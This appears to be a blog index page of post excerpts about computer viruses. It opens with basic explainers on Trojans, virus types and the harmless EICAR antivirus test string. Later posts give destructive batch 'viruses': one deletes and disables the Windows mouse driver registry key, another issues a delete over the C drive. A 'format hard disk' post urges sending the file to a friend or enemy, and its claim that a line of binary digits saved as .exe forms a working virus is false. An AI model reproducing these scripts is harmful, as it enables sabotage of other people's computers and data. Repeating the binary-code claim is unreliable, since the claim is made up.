How to protect PC from autorun.inf Virus

Every computer users know about the word Virus. Viruses can damage your important data in your computer. We use antivirus to protect our computer from viruses, but antivirus has a limitation to identify viruses.     Mostly viruses come to PC through Internet, Pen-drive and Floppy (Nowadays most of the people are not using floppy). And we

What is a Trojan Horse ???

What is a Trojan ? “A Trojan Horse, or Trojan, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user’s computer system”. – Wikipedia “A Trojan horse is an apparently useful program containing hidden functions that can exploit the

What is a Computer Virus ?

What is a Computer Virus ? A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user. Types of viruses :- The different types of viruses are as follows- 1) Boot Sector Virus :- Boot sector viruses infect either the master boot

Is your antivirus working perfect ?

  This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer. First open Notepad and copy below code into it. X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*  Save the file as virus.exe

Make a virus that disable Mouse

  we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself. Open Notepad and copy below codes rem ——————————— rem Disable Mouse set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass” reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem ——————————— Save this file as  virus.bat Done you just created

Virus to Format Hard Disk !!!

Today i will show you how to make a virus to format Hard disk. You can send this file to your friend or enemy to format their Hard disk. But please dont try thison your own computer or else you will end up formatting your own computer. Copy the below codes into Notepad. 01001011000111110010010101010101010000011111100000 Save the file as Format.exe You have created your

Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer. 1. Open Notepad and copy below code into it. @Echo off Del C:\ *.* |y 2. Then Save this file as virus.bat